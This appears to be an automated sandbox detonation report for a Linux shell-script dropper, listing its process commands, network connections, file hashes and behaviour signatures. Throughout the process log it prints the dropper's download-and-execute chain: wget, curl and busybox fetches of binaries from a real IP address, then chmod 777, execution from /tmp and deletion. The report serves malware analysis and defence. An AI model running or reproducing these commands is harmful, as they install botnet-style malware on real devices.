[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/rm

[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/wget

[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/chmod

[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh

[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/rm

[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/chmod

[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4

[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/rm

[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/wget

[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/chmod

[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P

[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/rm

[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/wget

[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/chmod

[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT

[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/rm

[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/wget

[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/chmod

[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR

[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/rm

[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/wget

[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/chmod

[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t

[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/rm

[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/wget

[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/chmod

[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW

[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/rm

[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/wget

[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/chmod

[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq

[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/rm

[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/wget

[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/chmod

[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh

[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/rm

[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/chmod

[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4

[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/rm

[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/wget

[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/chmod

[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P

[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/rm

[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/wget

[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/chmod

[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT

[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/rm

[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/wget

[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/chmod

[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR

[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/rm

[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/wget

[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/chmod

[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t

[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/rm

[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/wget

[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/chmod

[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG

[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/rm

[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/wget

[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/chmod

[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK

[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/rm

[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/wget

[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/chmod

[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/rm

[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/wget

[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/chmod

[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw

[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/rm

[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/wget

[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/chmod

[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ

[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/rm

[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/chmod

[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q

[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/rm

[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
N/A 224.0.0.251:5353 udp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
GB 84.17.50.9:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.39:443 1527653184.rsc.cdn77.org tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 01:28

Reported

2024-10-21 01:30

Platform

debian9-armhf-20240611-en

Max time kernel

59s

Max time network

73s

Command Line

[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt N/A
N/A /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw N/A
N/A /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ N/A
N/A /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q N/A
N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK N/A
N/A /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW N/A
N/A /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq N/A
N/A /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh N/A
N/A /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 N/A
N/A /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P N/A
N/A /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT N/A
N/A /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR N/A
N/A /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t N/A
N/A /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW N/A
N/A /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq N/A
N/A /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh N/A
N/A /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 N/A
N/A /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P N/A
N/A /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT N/A
N/A /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR N/A
N/A /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t N/A
N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK N/A
N/A /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
